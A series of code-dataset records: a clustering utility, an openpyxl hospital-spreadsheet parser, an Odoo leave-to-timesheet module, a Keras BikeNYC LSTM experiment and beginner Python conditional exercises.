[1, 4])\n df: the data frame\n nclusters: number of clusters to run\n '''\n \n from tqdm import tqdm #provide visual bar\n import plotly.graph_objects as go\n \n#Choosing optimal K value\n costs = []\n n_clusters = []\n clusters_assigned = []\n \n for num_clusters in tqdm(range(2,nclusters)):\n kproto = KPrototypes(n_clusters=num_clusters, init='Huang', n_jobs=-1, max_iter=50) \n clusters = kproto.fit_predict(df, categorical=categorical)\n \n costs.append(kproto.cost_) \n n_clusters.append(num_clusters)\n clusters_assigned.append(clusters)\n\n fig = go.Figure(data=go.Scatter(x=n_clusters, y=costs ))\n fig.show()\n \n return clusters_assigned\n\n#kprototypes_cost(dft, categorical=[6], nclusters=4) \n#----------------------------------------------------------------\ndef kmodes_cost(df_in, ncluster=8):\n '''kmodes_cost(df_in, ncluster=8)\n https://github.com/nicodv/kmodes/blob/master/kmodes/kmodes.py\n \n def __init__(self, n_clusters=8, max_iter=100, cat_dissim=matching_dissim,\n init='Cao', n_init=10, verbose=0, random_state=None, n_jobs=1):\n '''\n \n from tqdm import tqdm #provide visual bar\n\n cost = []\n for i in tqdm(range(1,ncluster)):\n kmode = KModes(n_clusters=i, init = \"Cao\", n_jobs=-1)\n kmode.fit_predict(df_in)\n cost.append(kmode.cost_)\n \n y = np.array([i for i in range(1,ncluster,1)])\n plt.plot(y,cost) \n plt.xlabel('K')\n plt.ylabel('Cost');\n#----------------------------------------------------------------\n#----------------------------------------------------------------\n#----------------------------------------------------------------\n\n\n","sub_path":"cluster_utility.py","file_name":"cluster_utility.py","file_ext":"py","file_size_in_byte":21364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"479434846","text":"print (\"Importing openpyxl and RNG\")\nimport openpyxl\nfrom random import randint\nprint(\"Success\")\n\nfrom openpyxl.cell import get_column_letter, column_index_from_string\nprint ('Importing OS and Time')\nimport os\nimport time\nimport datetime\nprint(\"Success\")\nprint(\"Configuring console\")\nimport sys\nos.getcwd()\n\n\n#Questions\nw = str(input(\"What workbook do you wish to process? \"))\nprint ('The following questions pertain to all centers')\nprint('')\nyear_p = int(input('What year is the base for counting closed and open centers? '))\nrow_new = int(input('How many rows would you like to check? '))\nnewsheet = input(\"What tab is the material to process on? 
\")\nprint(\"\")\nprint(\"\")\n\nw_name = w+'.xlsx'\nprint(\"Workbook\",w,\"found\")\nprint(\"Opening and soft copying workbook (this takes longer for larger files)\")\nwb = openpyxl.load_workbook(w+'.xlsx') #ENTER XLSX NAME HERE WITH TAIL\n\n\nclosedsheet = newsheet\n\nsheet = wb.get_sheet_by_name(str(newsheet)) #ENTER SHEET NAME HERE\nsheetx = wb.get_sheet_by_name(str(closedsheet))\n\nyear_x = year_p\nrow_closed = row_new\n\ncapr = sheet.get_highest_row()\ncapc = sheet.get_highest_column()\n\ncapxr = sheetx.get_highest_row()\ncapxc = sheetx.get_highest_column()\n\n#OPEN counter\n\nx = 2\ncount = 0\n\nYP = int(year_p * 10000)\nprint('Checking for year', year_p, 'as floor parameter', YP)\n\nif 1 + 2 == 3:\n\tprint(\"Checking for new centers opened since\", year_p, \"will begin soon\")\n\ttime.sleep(2)\n\nwhile x <= row_new: #PARAMETER\n\tsys.stdout.write(\"\\rChecking row #%.0f\" % (x))\n\tsys.stdout.flush()\n\tif int(sheet.cell(row = int(x), column = int(4)).value) > YP: #PARAMATERS\n\t\tcount += 1\n\tx+=1\nprint(\"\")\nprint (\"New Centers:\",count)\nprint(\"\")\n#CLOSED counter\nYX = int(year_x * 10000)\nxx = 2\ncountx = 0\n\nprint('Checking for year', year_x, 'as floor parameter', YX)\n\nif 1 + 2 == 3:\n\tprint(\"Checking for centers closed since\", year_x, \"will begin soon\")\n\ttime.sleep(5)\n\n\nwhile xx <= row_closed: #PARAMETER\n\tsys.stdout.write(\"\\rChecking row #%.0f\" % (xx))\n\tsys.stdout.flush()\n\trowxx = int(sheetx.cell(row = int(xx), column = int(3)).value or 0)\n\tif rowxx == \"None\":\n\t\tprint\n\telif rowxx > YX:\n\t\tcountx += 1\n\txx+=1\n\nprint(\"\")\nprint (\"Closed Centers:\",countx)\nprint(\"\")\n\n######### COUNTING RESULT WORKBOOK CREATION\nwbnew = openpyxl.Workbook()\nwbnew.create_sheet()\nwbnew.create_sheet(index=0, title='First_Sheet')\nsheet1 = wbnew.get_sheet_by_name('First_Sheet')\nsheet1['A1'] = \"New centers since %s\" % (year_p)\nsheet1['A2'] = \"Centers closed %s\" % (year_x)\nsheet1['B1'] = count\nsheet1['B2'] = countx\nsheet1.column_dimensions['A'].width = 22\nsheet1.column_dimensions['B'].width = 9\n\nr = randint(0,100000)\n\ntoday = datetime.date.today()\nyear = today.year\nmon = today.month\nday = today.day\nctime = today.ctime()\nordinal = today.toordinal()\nletterR = 'r'\nzero = 0\nwbnew.save('results_DATE%.0f%.0f%.0fRNG%.0f%.0f%.0f%.0f%.0f.xlsx' % (year,mon,day,zero,zero,zero,r,ordinal))\n\nprint (\"Results created in mother folder\")\n\nif 1 + 2 == 3:\n\tprint('Creation of filtered dictionary will begin soon')\n\ttime.sleep(3)\n\n\nprint(\"\")\n\n\n\n#CREATING TABS for organized excel file \nsheeth = sheetx \n\nfiltered_dict_h = {}\n\nxx = 1\nsupercount = 0\n\nwhile xx-1 <= row_new:\n\tsys.stdout.write(\"\\r Found hospital center #%.0f\" % (supercount+1))\n\tsys.stdout.flush()\n\tcell = \"A%.0f\" % (xx)\n\tndict = []\n\tif sheeth[cell].value == 1: ########## DEFINE VALUE HERE, CHANGE TO 1 FOR HOSP\n\t\n\t\ti = 1\n\t\tsupercount += 1\n\t\twhile i <= capc:\n\t\t\tv_a = str(sheeth.cell(row = int(xx), column = int(i)).value or '')\n\t\t\tndict.insert(len(ndict), str(v_a))\n\t\t\ti += 1\n\t\tfiltered_dict_h.update({ xx: ndict})\n\txx += 1\n\nprint(\" \")\n\n#Hospital workbook creation\n\nwb2new = openpyxl.Workbook()\nprint ('creating new workbook for parsed data')\nwb2new.create_sheet()\nwb2new.create_sheet(index=0, title='Hospitals')\nsheet = wb2new.get_sheet_by_name('Hospitals')\n\n\n\n#GENERAL SHEET #################################\n\nprint('')\nmegacount = 0\nprint('Creating the general sheet')\nif 1 + 2 == 3:\n\ttime.sleep(3)\n\nx = 
2\nwhile x <= row_new:\n\tp = 100*((x)/row_new)\n\tsys.stdout.write(\"\\r Creation of General Sheet is %d%% Complete\" % p)\n\ti = 1\n\twhile i < capc:\n\t\tc = get_column_letter(i)\n\t\tsheet['%s%.0f' % (c, x)] = str(filtered_dict_h[x][i])\n\t\tmegacount += 1\n\t\ti += 1\n\tx += 1\n\tsys.stdout.flush()\nr = randint(0,10000000)\n\nprint(\" \")\n\n#OPEN TAB ###########################################\nprint(\"\")\nprint('Creating Open sheet')\nif 1 + 2 == 3:\n\ttime.sleep(3)\n\nwb2new.create_sheet(index=1, title='Open_Hospitals')\nopensheet = wb2new.get_sheet_by_name('Open_Hospitals')\n\n\n#Count of Open Centers\n\n\nmegacountn = 0\n\nx = 2\nwhile x < row_new:\n\tsys.stdout.write(\"\\r Open center counter: %0f\" % (int(megacountn)))\n\tif filtered_dict_h[x][1] == '':\n\t\tmegacountn += 1\n\tsys.stdout.flush()\n\tx += 1\n\nmegacount = 0\nprint(\" \")\n\n#CREATING NEW DICTIONARY\n\nx = 2\nopenx = 0\nopendict = {}\n\nwhile x < row_new:\n\tp = ((x+1)/row_new)*100\n\tsys.stdout.write(\"\\r Creation of new dictionary set is %d%% complete\" % p)\n\tif filtered_dict_h[x][1] == '':\n\t\topendict.update({ openx: filtered_dict_h[x]})\n\t\topenx += 1\n\tsys.stdout.flush()\n\tx += 1\n\nprint(\" \")\n\n#PRINTING SHEET\nx = 1\nwhile x < megacountn:\n\tp = 100 * ((x+1)/megacountn)\n\tsys.stdout.write(\"\\r Creation of Open Sheet is %d%% Complete\" % p)\n\tif opendict[x][1] == '':\n\t\ti = 1\n\t\twhile i < capxc:\n\t\t\tc = get_column_letter(i)\n\t\t\topensheet['%s%.0f' % (c, x+1)] = str(opendict[x][i])\n\t\t\tmegacount += 1\n\t\t\ti += 1\n\tsys.stdout.flush()\t\n\tx += 1\n\nprint(\" \")\t\n\nprint(\"\")\n\n\n\n#OPEN X YEAR TAB ###########################################\nprint(\"\")\nprint('Creating Open on %0f sheet' % (year_p))\nif 1 + 2 == 3:\n\ttime.sleep(2)\n\nwb2new.create_sheet(index=2, title='Open %s Hospitals' % (str(year_p)))\nopensheet = wb2new.get_sheet_by_name('Open %s Hospitals' % (str(year_p)))\n\n\n#Count of Open Centers\n\n\nmegacountn = 0\n\nx = 2\nwhile x < row_new:\n\tsys.stdout.write(\"\\r Open x year counter: %0f\" % (int(megacountn)))\n\tif int(filtered_dict_h[x][3]) > YP:\n\t\tmegacountn += 1\n\tsys.stdout.flush()\n\tx += 1\n\nmegacount = 0\nprint(\" \")\n\n#CREATING NEW DICTIONARY\n\nx = 2\nopenx = 0\nopendict = {}\n\nwhile x < row_new:\n\tp = ((x+1)/row_new)*100\n\tsys.stdout.write(\"\\r Creation of new dictionary set is %d%% complete\" % p)\n\tif int(filtered_dict_h[x][3]) > YP:\n\t\topendict.update({ openx: filtered_dict_h[x]})\n\t\topenx += 1\n\tsys.stdout.flush()\n\tx += 1\n\nprint(\" \")\n\n#PRINTING SHEET\nx = 1\nwhile x < megacountn:\n\tp = 100 * ((x+1)/megacountn)\n\tsys.stdout.write(\"\\r Creation of Open Sheet is %d%% Complete\" % p)\n\tif int(opendict[x][3]) > YP:\n\t\ti = 1\n\t\twhile i < capxc:\n\t\t\tc = get_column_letter(i)\n\t\t\topensheet['%s%.0f' % (c, x+1)] = str(opendict[x][i])\n\t\t\tmegacount += 1\n\t\t\ti += 1\n\tsys.stdout.flush()\t\n\tx += 1\n\nprint(\" \")\t\n\nprint(\"\")\n\n\n\n#CLOSED TAB #############################################\nprint('Creating closed centers sheet')\nif 1 + 2 == 3:\n\ttime.sleep(3)\n\nwb2new.create_sheet(index=3, title='Closed_Hospitals')\nclosedsheet = wb2new.get_sheet_by_name('Closed_Hospitals')\n\n\nprint(\" \")\nmegacountc = 0\n\nx = 2\nYP = int(year_p * 10000)\nwhile x < row_new:\n\tsys.stdout.write(\"\\r Closed center counter: %.0f\" % (int(megacountc)))\n\tv_a = str(sheeth.cell(row = int(x), column = int(3)).value or 0)\n\tif int(v_a) > YP:\n\t\tmegacountc +=1\n\tsys.stdout.flush()\n\tx+=1\n\nmegacount = 0\nprint(' 
')\n\nx = 2\nxx = 0\ncloseddict = {}\nxx = 0\nwhile x < row_new:\n\tp = ((x+1)/row_new)*100\n\tsys.stdout.write(\"\\rCreation of new dictionary set is %d%% complete\" % p)\n\tv_a = str(sheeth.cell(row = int(x), column = int(3)).value or 0)\n\tndict = []\n\tif int(v_a) > YP:\n\t\txx += 1\n\t\ti = 1\n\t\twhile i <= capc:\n\t\t\tv_a = str(sheeth.cell(row = int(x), column = int(i)).value or '')\n\t\t\tndict.insert(len(ndict), str(v_a))\n\t\t\ti += 1\n\t\tcloseddict.update({ xx: ndict})\n\tsys.stdout.flush()\n\tx += 1\nprint(\" \")\n\n\nx = 1\nwhile x < megacountc:\n\tp = 100*((x+1)/megacountc)\n\tsys.stdout.write(\"\\rCreation of Closed Sheet is %d%% Complete\" % p)\n\ti = 1\n\twhile i < capxc:\n\t\tc = get_column_letter(i)\n\t\tcx = c + str(x+1)\n\t\tclosedsheet[cx] = str(closeddict[x][i])\n\t\tmegacount += 1\n\t\ti += 1\n\tsys.stdout.flush()\n\tx+= 1\nprint(\" \")\nprint(\"\")\n#conclusion of final document\n\nprint ('Creating List of Hospitals Centers.xlsx, this will take a while')\nprint ('DO NOT OPEN THE LIST FILE SINCE IT IS BEING BUILT')\nprint(\"\")\nwb2new.save('list of hospital centers%.0f.xlsx' % (r))\nprint (\"You may open the result file\")\n\ni = 15\nwhile 0 < i <= 15:\n\ttime.sleep(.1)\n\tsys.stdout.write(\"\\r Program closing in %.1f second(s) \" % i)\n\tsys.stdout.flush()\n\ti -= .1","sub_path":"Parse Hospital file.py","file_name":"Parse Hospital file.py","file_ext":"py","file_size_in_byte":8419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"544675775","text":"import calendar\nimport datetime\nfrom datetime import date\nimport logging\nimport math\nimport time\nfrom operator import attrgetter\nfrom werkzeug import url_encode\nfrom openerp.tools import DEFAULT_SERVER_DATETIME_FORMAT\n\nfrom dateutil.relativedelta import relativedelta\n\nfrom openerp.exceptions import UserError, AccessError\nfrom openerp import tools\nfrom openerp.tools.translate import _\nfrom openerp import models, api, fields\n\nclass hr_holidays(models.Model):\n _inherit = \"hr.holidays\"\n\n @api.multi\n def holidays_refuse(self):\n res = super(hr_holidays, self).holidays_refuse()\n account_analytic_line_obj = self.env[\"account.analytic.line\"]\n for holiday in self:\n analytic_line_ids = account_analytic_line_obj.search([('fal_leave_id', '=', holiday.id)])\n if analytic_line_ids:\n analytic_line_ids.unlink()\n return res\n\n @api.multi\n def holidays_validate(self):\n res = super(hr_holidays, self).holidays_validate()\n timesheet_obj = self.env[\"hr_timesheet_sheet.sheet\"]\n account_analytic_line_obj = self.env[\"account.analytic.line\"]\n for holiday in (holidays for holidays in self if holidays.date_from and holidays.date_to):\n date_from = datetime.datetime.strptime(holiday.date_from, DEFAULT_SERVER_DATETIME_FORMAT)\n date_to = datetime.datetime.strptime(holiday.date_to, DEFAULT_SERVER_DATETIME_FORMAT)\n if res:\n not_working_days = ['0', '1', '2', '3', '4', '5', '6']\n employee_id_obj = holiday.employee_id\n if employee_id_obj.contract_id and employee_id_obj.contract_id.working_hours:\n for attendance_id in employee_id_obj.contract_id.working_hours.attendance_ids:\n if attendance_id.dayofweek in not_working_days:\n not_working_days.remove(attendance_id.dayofweek)\n for i in range((date_to - date_from).days + 1):\n if not (str((date_from + datetime.timedelta(days=i)).weekday()) in not_working_days):\n leave_time = sum((working_hours.hour_to - working_hours.hour_from) for working_hours in 
                employee_id_obj = holiday.employee_id\n                if employee_id_obj.contract_id and employee_id_obj.contract_id.working_hours:\n                    for attendance_id in employee_id_obj.contract_id.working_hours.attendance_ids:\n                        if attendance_id.dayofweek in not_working_days:\n                            not_working_days.remove(attendance_id.dayofweek)\n                for i in range((date_to - date_from).days + 1):\n                    if not (str((date_from + datetime.timedelta(days=i)).weekday()) in not_working_days):\n                        leave_time = sum((working_hours.hour_to - working_hours.hour_from) for working_hours in holiday.employee_id.contract_id.working_hours.attendance_ids if int(working_hours.dayofweek) == (date_from + datetime.timedelta(days=i)).weekday())\n                        vals = holiday._prepare_analytic_line_vals(leave_time, date_from, i)\n                        account_analytic_line_obj.create(vals)\n                        if not timesheet_obj.search([('date_to', '>=', date_from + datetime.timedelta(days=i)), ('date_from', '<=', date_from + datetime.timedelta(days=i)), ('employee_id', '=', holiday.employee_id.id)]):\n                            from_day_of_week = (date_from + datetime.timedelta(days=i)).weekday()\n                            first_day_of_week = (date_from + datetime.timedelta(days=i)) - datetime.timedelta(days=from_day_of_week)\n                            timesheet_obj.create({\n                                'employee_id': holiday.employee_id and holiday.employee_id.id,\n                                'date_from': first_day_of_week,\n                                'date_to': first_day_of_week + datetime.timedelta(days=6),\n                                'state': 'draft',\n                                'department_id': holiday.department_id and holiday.department_id.id or False,\n                                'company_id': holiday.employee_id and holiday.employee_id.company_id and holiday.employee_id.company_id.id or False,\n                            })\n        return res\n\n    @api.multi\n    def _prepare_analytic_line_vals(self, unit_amount, date_from, i):\n        self.ensure_one()\n        if not self.employee_id.fal_leave_timesheet_analytic_account_id:\n            raise UserError(_('Please Fill Employee Leave Timesheet Analytic Account First.'))\n        return {\n            'fal_leave_id': self.id,\n            'name': self.name or self.holiday_status_id and self.holiday_status_id.name,\n            'date': date_from + datetime.timedelta(days=i),\n            'unit_amount': unit_amount,\n            'account_id': self.employee_id.fal_leave_timesheet_analytic_account_id and self.employee_id.fal_leave_timesheet_analytic_account_id.id,\n            'is_timesheet': True,\n            'user_id': self.employee_id.user_id.id,\n        }\n\n# end of hr_holidays()\n\nclass account_analytic_line(models.Model):\n    _inherit = 'account.analytic.line'\n\n    fal_leave_id = fields.Many2one('hr.holidays', 'Leave')\n\n#end of account_analytic_line","sub_path":"fal_leave_timesheet/models/hr_holidays.py","file_name":"hr_holidays.py","file_ext":"py","file_size_in_byte":4532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"434863004","text":"from __future__ import print_function\r\nimport os\r\nimport cPickle as pickle\r\nimport numpy as np\r\nimport math\r\n\r\n\r\nos.environ[\"CUDA_VISIBLE_DEVICES\"]='0'\r\nimport tensorflow as tf #from V1707\r\nimport setproctitle #from V1707\r\nfrom keras import backend as K\r\nK.set_image_data_format('channels_first')\r\n\r\nconfig=tf.ConfigProto() #from V1707\r\n#config.gpu_options.allow_growth=True #from V1707\r\nconfig.gpu_options.per_process_gpu_memory_fraction=0.7\r\nsess=tf.Session(config=config) #from V1707\r\n#import keras.backend.tensorflow_backend as KTF\r\n#KTF._set_session(tf.Session(config=config))\r\nsetproctitle.setproctitle('try@linziqian') #from V1707\r\n\r\n\r\nos.environ[\"DATAPATH\"]='/home/stu/linziqian'\r\n\r\n\r\nfrom keras.optimizers import Adam\r\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint\r\nfrom keras.layers import Reshape,Input,LSTM,Activation,Dense,average,Concatenate,Add,Dropout,BatchNormalization,PReLU\r\nfrom keras.models import Model\r\nfrom keras.layers.convolutional import Convolution2D\r\nfrom deepst.models.STResNet import stresnet\r\nfrom deepst.config import Config\r\nimport deepst.metrics as metrics\r\nfrom deepst.datasets import BikeNYC\r\nnp.random.seed(1337) # for reproducibility\r\nfrom pdb import set_trace\r\n#set_trace()\r\n\r\n# parameters\r\n# data path, you may set your own data path with the global environmental\r\n# variable DATAPATH\r\nDATAPATH = Config().DATAPATH\r\nnb_epoch = 200 # number of epoch at training stage\r\nnb_epoch_cont = 200 # number of epoch at training (cont) stage\r\nbatch_size = 128 # batch size\r\nT = 24 # number of time intervals in one day\r\n\r\nlr = 0.0002 # learning rate\r\nlen_closeness = 4 # length of closeness dependent sequence\r\nlen_period = 4 # length of period dependent sequence\r\nlen_trend = 4 # length of trend dependent sequence\r\nnb_residual_unit = 4 # number of residual units\r\n\r\nnb_flow = 2 # there are two types of flows: new-flow and end-flow\r\n# divide data into two subsets: Train & Test, of which the test set is the\r\n# last 10 days\r\ndays_test = 10\r\nlen_test = T * days_test\r\nmap_height, map_width = 16, 8 # grid size\r\n# For NYC Bike data, there are 81 available grid-based areas, each of\r\n# which includes at least ONE bike station. Therefore, we modify the final\r\n# RMSE by multiplying the following factor (i.e., factor).\r\nnb_area = 81\r\nm_factor = math.sqrt(1. * map_height * map_width / nb_area)\r\nprint('factor: ', m_factor)\r\n
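# Editor's note (worked example): with map_height=16, map_width=8 and nb_area=81,\r\n# m_factor = sqrt(16*8/81) = sqrt(128/81) ~ 1.257, so the \"real\" RMSE printed\r\n# later is scaled up by roughly 25.7% to account for grid cells without stations.\r\n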
path_result = 'RET'\r\npath_model = 'MODEL'\r\n\r\nif os.path.isdir(path_result) is False:\r\n    os.mkdir(path_result)\r\nif os.path.isdir(path_model) is False:\r\n    os.mkdir(path_model)\r\n\r\n\r\n#Conv2=np.zeros([8,8])\r\n#LSTM2=np.zeros([8,8])\r\nConv2=np.load('Conv2.npy')\r\nLSTM2=np.load('LSTM2.npy')\r\n\r\nTT1=1\r\nFF1=128\r\ninput1_128=Input(shape=[FF1])\r\ncpt_conv1=PReLU()(input1_128)\r\ncpt_conv1=BatchNormalization()(cpt_conv1)\r\ncpt_conv1=Dropout(0.2)(cpt_conv1)\r\ncpt_conv1=Dense(units=2,activation='tanh')(cpt_conv1)\r\nmodel1=Model(inputs=input1_128,outputs=cpt_conv1)\r\nmodel1.compile(loss='mse', optimizer=Adam(lr), metrics=[metrics.rmse])\r\n\r\n\r\nprint(\"loading data...\")\r\nX_train, Y_train, X_test, Y_test, mmn, external_dim, timestamp_train, timestamp_test = BikeNYC.load_data(\r\n    T=T, nb_flow=nb_flow, len_closeness=len_closeness, len_period=len_period, len_trend=len_trend, len_test=len_test,\r\n    preprocess_name='preprocessing.pkl', meta_data=False)\r\nprint(\"\\n days (test): \", [v[:8] for v in timestamp_test[0::T]])\r\n\r\nXX_train=np.load('XX_train.npy')\r\nXXp_test=np.load('XXp_test.npy')\r\n\r\nfor X in range(8):\r\n    for Y in range(8):\r\n        if X<=0:\r\n            continue\r\n        if X==1 and Y<=5:\r\n            continue\r\n        \r\n        XTRAIN=XX_train[:,:,X+8,Y]\r\n        YTRAIN=Y_train[:,:,X+8,Y]\r\n        XTEST=XXp_test[9:,:,X+8,Y]\r\n        YTEST=Y_test[:,:,X+8,Y]\r\n        \r\n        print('XTRAIN.shape= ',XTRAIN.shape)\r\n        print('YTRAIN.shape= ',YTRAIN.shape)\r\n        print('XTEST.shape= ',XTEST.shape)\r\n        print('YTEST.shape= ',YTEST.shape)\r\n        \r\n        F1='DENSE2.hdf5'\r\n        \r\n        model_checkpoint=ModelCheckpoint(\r\n            filepath=F1,\r\n            monitor='val_rmse',\r\n            verbose=1,\r\n            save_best_only=True,\r\n            save_weights_only=False,\r\n            mode='min',\r\n            period=1\r\n        )\r\n        \r\n        print('=' * 10)\r\n        print(\"training model...\")\r\n        history = model1.fit(XTRAIN, YTRAIN,\r\n                             nb_epoch=nb_epoch,\r\n                             batch_size=batch_size,\r\n                             validation_split=0.1,\r\n                             callbacks=[model_checkpoint],\r\n                             verbose=1)\r\n        \r\n        print('=' * 10)\r\n        print('evaluating using the model that has the best loss on the valid set')\r\n        model1.load_weights(F1)\r\n        score = model1.evaluate(XTRAIN, YTRAIN, batch_size=YTRAIN.shape[0] // 48, verbose=0)\r\n        print('Train score: %.6f rmse (norm): %.6f rmse (real): %.6f' %\r\n              (score[0], score[1], score[1] * (mmn._max - mmn._min) / 2. 
* m_factor))\r\n score = model1.evaluate(XTEST, YTEST, batch_size=YTEST.shape[0], verbose=0)\r\n print('Test score: %.6f rmse (norm): %.6f rmse (real): %.6f' %\r\n (score[0], score[1], score[1] * (mmn._max - mmn._min) / 2. * m_factor))\r\n\r\n Conv2[X,Y]=score[1] * (mmn._max - mmn._min) / 2. * m_factor\r\n\r\n\r\n TT2=10\r\n FF2=128\r\n \r\n input2_128=Input(shape=(TT2,FF2))\r\n cpt_conv2=PReLU()(input2_128)\r\n cpt_conv2=BatchNormalization()(cpt_conv2)\r\n cpt_conv2=LSTM(units=2,activation='tanh', recurrent_activation='hard_sigmoid',return_sequences=False)(cpt_conv2)\r\n output2=Dense(units=2)(cpt_conv2)\r\n model2=Model(inputs=input2_128,outputs=output2)\r\n model2.compile(loss='mse', optimizer=Adam(lr), metrics=[metrics.rmse])\r\n \r\n Xtrain=XX_train[:,:,X+8,Y].reshape([-1,1,FF2])\r\n XTRAIN=Xtrain[:-9]\r\n for i in range(8):\r\n XTRAIN=np.concatenate((XTRAIN,Xtrain[i+1:-(8-i)]),axis=1)\r\n XTRAIN=np.concatenate((XTRAIN,Xtrain[9:]),axis=1)\r\n \r\n Xptest=XXp_test[:,:,X+8,Y].reshape([-1,1,FF2])\r\n XTEST=Xptest[:-9]\r\n for i in range(8):\r\n XTEST=np.concatenate((XTEST,Xptest[i+1:-(8-i)]),axis=1)\r\n XTEST=np.concatenate((XTEST,Xptest[9:]),axis=1)\r\n \r\n YTRAIN=Y_train[9:,:,X+8,Y].reshape([-1,2])\r\n YTEST=Y_test[:,:,X+8,Y].reshape([-1,2])\r\n \r\n print('XTRAIN.shape= ',XTRAIN.shape)\r\n print('YTRAIN.shape= ',YTRAIN.shape)\r\n print('XTEST.shape= ',XTEST.shape)\r\n print('YTEST.shape= ',YTEST.shape)\r\n\r\n F2='LSTM2.hdf5'\r\n \r\n model_checkpoint=ModelCheckpoint(\r\n filepath=F2,\r\n monitor='val_rmse',\r\n verbose=1,\r\n save_best_only=True,\r\n save_weights_only=False,\r\n mode='min',\r\n period=1\r\n )\r\n \r\n print('=' * 10)\r\n print(\"training model...\")\r\n history = model2.fit(XTRAIN, YTRAIN,\r\n nb_epoch=nb_epoch,\r\n batch_size=batch_size,\r\n validation_split=0.1,\r\n callbacks=[model_checkpoint],\r\n verbose=1)\r\n \r\n print('=' * 10)\r\n print('evaluating using the model that has the best loss on the valid set')\r\n model2.load_weights(F2)\r\n score = model2.evaluate(XTRAIN, YTRAIN, batch_size=YTRAIN.shape[0] // 48, verbose=0)\r\n print('Train score: %.6f rmse (norm): %.6f rmse (real): %.6f' %\r\n (score[0], score[1], score[1] * (mmn._max - mmn._min) / 2. * m_factor))\r\n score = model2.evaluate(XTEST, YTEST, batch_size=YTEST.shape[0], verbose=0)\r\n print('Test score: %.6f rmse (norm): %.6f rmse (real): %.6f' %\r\n (score[0], score[1], score[1] * (mmn._max - mmn._min) / 2. * m_factor))\r\n \r\n LSTM2[X,Y]=score[1] * (mmn._max - mmn._min) / 2. 
* m_factor\r\n \r\n print(X+8,Y)\r\n print('Conv2',Conv2[X,Y])\r\n print('LSTM2',LSTM2[X,Y])\r\n np.save('Conv2.npy',Conv2)\r\n np.save('LSTM2.npy',LSTM2)\r\n","sub_path":"SRTcode/New/LSTM_new2.py","file_name":"LSTM_new2.py","file_ext":"py","file_size_in_byte":8192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"356434813","text":"# >>>>>>>>>>>>>>>>>>>> Part 1 <<<<<<<<<<<<<<<<<<<<\nassert 15 // 4 == 3\nassert 24 % 5 == 4\nassert 24 / 3 * 4 + 2 == 34.0\nassert 3 * 2 ** 4 - 8 == 40\nassert 5.1 >= 5.0\nassert not 4 == 3 + 2\nassert not 4 * 2 - 2 != 6\nassert 100 > 10\nassert True and (3 <= 5) is True\n# assert not x == 0 == 'Error'\n\n\n# >>>>>>>>>>>>>>>>>>>> Part 2 <<<<<<<<<<<<<<<<<<<<\nassert not (14 // 3 and 4 > 5)\nassert 0 > 10 or False is False\nassert 'cat' in ['cat', 2.5, 'dog']\nassert not ('cours' not in 'python course')\nassert 'bark' if 'dog' in [13, 'cat', 5.6, 'cow'] else 'meow' == 'meow'\n\nmy_list = ['dog', 'cat', 'worm', 2.3]\nif 'doc' in my_list:\n my_list[1] = 4\nelse:\n my_list[2] = 6\n# print(my_list[1] my_list[2]) == 'cat 6'\n\nx = 10\nif x > 5:\n x += 5\nif x < 12:\n x += 5\nif x == 15:\n x += 5\nassert x == 20\n\nx = 20\nif True:\n x += 10\nif x == 20:\n x += 30\nelse:\n x += 40\nassert x == 70\n\nx = 4\nif 'z' in 'computer science':\n x += 10\nelif 5 % 3 == 2:\n x += 18\nelif 5 > 4:\n x += 30\nelse:\n x += 5\nassert x == 22\n\nx = 'c'\ny = 3\nif 'x' in 'computer science':\n y += 5\nelse:\n y += 10\nif x in 'computer science':\n y += 20\nelse:\n y += 40\nassert y == 33\n\n\n# >>>>>>>>>>>>>>>>>>>> Part 3 <<<<<<<<<<<<<<<<<<<<\n# Write a program which asks the user to enter their age in years\n# (Assume that the user always enters an integer) and based on the\n# following conditions, prints the output exactly as in the following\n# format (as highlighted in yellow):\n#\n# INPUT: age is less than or equal to 0\n# OUTPUT: 'UNBORN'\n#\n# INPUT: age is greater than 0 and less than or equal to 150\n# OUTPUT: 'ALIVE'\n#\n# INPUT: age is greater than 150\n# OUTPUT: 'VAMPIRE'\n\nage = int(input())\nif age <= 0:\n print('UNBORN')\nelif age <= 150:\n print('ALIVE')\nelse:\n print('VAMPIRE')\n\n\n# >>>>>>>>>>>>>>>>>>>> Part 4 <<<<<<<<<<<<<<<<<<<<\n# Write a program which asks the user to enter a positive integer 'n'\n# (Assume that the user always enters a positive integer) and based on\n# the following conditions, prints the appropriate results exactly as\n# shown in the following format:\n#\n# INPUT: 'n' is divisible by both 2 and 3 (for example 12)\n# OUTPUT: 'BOTH'\n#\n# INPUT: 'n' is divisible by either 2 or 3\n# OUTPUT: 'ONE'\n#\n# INPUT: 'n' is neither divisible by 2 nor divisible by 3\n# OUTPUT: 'NEITHER'\n\nn = int(input())\nif not n % 6:\n print('BOTH')\nelif not n % 2 or not n % 3:\n print('ONE')\nelse:\n print('NEITHER')\n\n\n# >>>>>>>>>>>>>>>>>>>> Part 5 <<<<<<<<<<<<<<<<<<<<\n# Write a program which asks the user to enter an integer 'n' which would\n# be the total numbers of hours the user worked in a week and calculates\n# and prints the total amount of money the user made during that week.\n#\n# If 'n' == any number less than 0 or greater than 168, print 'INVALID'\n# Assume that hourly rate for the first 40 hours is $8 per hour.\n# Hourly rate for extra hours between 41 and 50 (41 <= n <= 50 ) is $9 per hour.\n# Hourly rate for extra hours greater than 50 is $10 per hour.\n#\n# INPUT: -5\n# OUTPUT: 'INVALID'\n#\n# INPUT: -5\n# OUTPUT: 'INVALID'\n#\n# INPUT: 34\n# OUTPUT: 'YOU MADE 272 DOLLARS THIS WEEK'\n#\n# 
